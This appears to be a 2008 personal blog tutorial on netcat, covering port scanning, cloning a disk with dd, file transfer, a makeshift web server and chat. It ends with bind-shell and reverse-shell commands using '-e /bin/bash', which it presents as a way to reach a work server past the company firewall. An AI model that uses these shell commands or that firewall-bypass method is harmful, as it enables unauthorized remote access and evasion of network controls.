Tuesday, December 9, 2008

NetCat! RAWR!

Big time in tiny town.

So this is a story about a small program that has a myriad of different uses. This tool is called netcat. To start out I am going to go over some of the more practical uses of netcat. The most common use that is probably the most well known is using netcat as a simple port scanner.

nc -v -w 1 localhost -z 1-3000


This example is passively scanning localhost for any open ports in the range of 1 to 3000. Pretty simple eh? Try it on you local machine you might be surprised what is open. Unless you are a paranoid freak who uses hardened linux with every port closed so the aliens can't invade your hard drive to steal your password to your TiVO to read your mind through television waves.

Ok the aliens aside this next example I haven't really found a practical use for as of yet but I could see it being helpful in a pinch. We are going to use netcat to make a copy of a hard drive over the network with the aid of dd.

Server:
nc -l -p 9000 | dd of=/dev/sda

Client:
dd if=/dev/sda | nc 192.168.0.1 9000


To explain what is going on here first we create a netcat server that listens on port 9000 and pipe this output to dd with the output set to /dev/sda (the hard drive we want to write the image to). Now we setup the client connection by using dd to read the disk we want copied and piping it's output to netcat which connects to our server on port 9000. Make sure to be careful if you try this we don't want anyone to accidentally nuke an important drive.

Another simple little thing you can do with netcat is create a makeshift webserver to server up some content.

One shot single connection:
nc -l -p 80 -q 1 < darkpages.html

Accept multiple connections:
while true; do nc -l -p 80 -q 1 < stuff.html; done


This is a pretty hack way to do this sort of thing but it would work. Now you can do this this sort of thing alot prettier with socat but that is subject for a post of it's own.

Now lets see what else is there to cover here. Ah yes I always forget about this one but it's not the most usefull as there are MANY other tools to aid in something like this on linux. If you haven't guessed I am talking about using netcat to transfer large files.

Server:
nc -lp 1337 > file.gz

Client:
nc -w 1 192.168.0.10 1337 < file.gz


Ok as you can tell this is very similar to the previous example using dd. First we create our server that is writing to our destination file. Next we create the client which if fed our source file and connect to the server. The "-w 1" will close the connection once the file is done transfering. Ok so since this is pretty useless I am going to kick it up a notch just for fun =).

Server:
nc -lp 1337 | pv | gunzip > file

Client:
cat file | gzip | nc -w 1 192.168.0.10 1337


Now in this example we are compressing the data one the fly on the client side. On the server side we pipe the output to pv so that we get a nice little display of the current data transfered, current transfer speed, as well as uncompressing on the fly.

Another silly thing that can be done with netcat would be using it as a simple chat server. Granted this isn't pretty but it would get the job done if you needed to chat it up without installing other crap.

Server:
nc -lp 9000

Client:
nc 192.168.0.10 9000


Either you or your friend start the server and the other one starts the client, then you type. Yes it's that simple!

I guess I should cover the more advanced uses now. You can use netcat as a light telnet server doing something similar to the following.

Server:
nc -lp 1337 -e /bin/bash

Client:
nc 192.168.0.10 1337


Once you created the server you can now connect and use any commands you normally would in bash it's pretty cool I think. Now a spin off of this would be what is called the revrse telnet server. What is a reservse telnet server? I am glad you asked =). Lets say your work firewall is locked down and you can't poke any hole to be able to access your work server outside of work, but you can access the internet via port 80. Well you are in LUCK!

Server:
nc -lp 80

Client:
nc 192.168.0.10 80 -e /bin/bash


Now how this works is you create the server on your home machine it's listening for connections on port 80 since we know our work firewall will allow port 80. Ok now the cool part from the server behind the firewall we connect out to our home pc but tell netcat that /bin/bash will be interpreting any commands that it gets in return. Ok we are connected and from our home machine we can now run commands directly on the work server!

Well I think this sums up this blog post I hope you all learned alot and find netcat as fun as I do =)! Please feel free to leave any comments about this blog.
Post a Comment